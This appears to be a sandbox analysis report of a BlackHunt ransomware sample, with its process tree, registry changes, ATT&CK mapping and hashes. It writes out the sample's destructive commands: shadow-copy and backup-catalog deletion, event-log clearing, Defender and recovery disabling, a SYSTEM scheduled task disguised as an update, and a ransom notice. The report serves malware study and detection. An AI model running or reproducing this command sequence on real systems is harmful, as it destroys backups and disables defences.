5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 131 PID 1372 wrote to memory of 2480 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 131 PID 1372 wrote to memory of 2740 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 222 PID 1372 wrote to memory of 2740 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 222 PID 1372 wrote to memory of 2740 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 222 PID 1372 wrote to memory of 2740 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 222 PID 1372 wrote to memory of 2520 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 127 PID 1372 wrote to memory of 2520 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 127 PID 1372 wrote to memory of 2520 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 127 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe"C:\Users\Admin\AppData\Local\Temp\5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1372 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:3048
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2696
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2768
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1132
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f4⤵PID:2760
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2184
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:3032 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f4⤵PID:2896
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:960
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:588
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1156
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:600
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:488
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:540
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1748
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1960
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2316
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe" /F2⤵PID:2892
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2180
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1464
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:940
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2840
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2824
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1632
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2784
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2796
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2680
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3032
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2176
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2624
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2472
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2520
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2740
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:4040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2480
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2808
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2336
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:1132
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2608
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2720
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2660
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2560
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2092
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2536
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3068
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3828
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3264
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:3836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:3808
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:3948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3724
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:3868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:2624
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:3956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:3916
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵
- Enumerates connected drives
PID:2272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:3988
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:2940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:1600
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:2324
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1116
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe"2⤵
- Deletes itself
PID:3780 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:3996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:4064
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:3180
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3452
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3800
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3220
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:3792
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:3640
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:3268
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:3232
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:3616
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:2740
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:3512
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:1852
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f1⤵PID:108
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:2900
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:320
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵PID:2908
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1732
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:1560
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:320
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:2272
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:1104
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:3208
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:2776
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:2748
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:2604
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f1⤵PID:2904
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:2460
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe" /F1⤵
- Creates scheduled task(s)
PID:2856
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f1⤵PID:2144
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f1⤵PID:2236
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f1⤵PID:2540
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:2928
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f1⤵PID:1604
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f1⤵PID:112
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:2112
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:2116
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵PID:2032
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:1716
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f1⤵PID:1548
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:1176
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:2544
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:1072
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1589956061870730403110161716814791649381953999602595762142006176143-886579272"1⤵PID:2856
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:2780
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:2504
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f1⤵PID:1208
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f1⤵
- Adds Run key to start application
PID:1396
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "9316479841755530557-109648074916878262221812827967-1661111228-2136152827-1539971809"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:320
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:2464
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2952
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f1⤵
- Modifies registry class
PID:2896
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\1⤵PID:3788
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1353162119-1194703936-1665851413677515383-616707681-13980366631808328270-689400613"1⤵
- Enumerates connected drives
PID:2604
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4000
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3772
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4020
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:3372
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt1⤵PID:2612
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:2824
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f1⤵PID:3932
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:2900
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4084
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3124
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:3184
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵
- Enumerates connected drives
PID:3628
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD589c8e5bbbf60ed503885d3af384daad4
SHA101ab4df02c987485fe6084d3ec483d9272640e54
SHA256383e31a7a448552619633de3b06a43156e2f86e6b4d952142e2e0c13efae0e7f
SHA512cf262c4673ee5f013c6021fc0dab2cbd8b20337e639fcc02f5f7fe0925cde5475c8587b02df6e3eb54ea4f285ca8c247cb05eb1ece53c3a396ca7c2809d26567
-
Filesize
12KB
MD5cc36c61a8d4bc6cbe3734d47db279417
SHA12e98ac82178dbacf230d4a82f42d16958ec12a4f
SHA2563e0037df73a89ada7aa5bac5b0148e345209c98fd4c2e83ddcecb28d35b9cf77
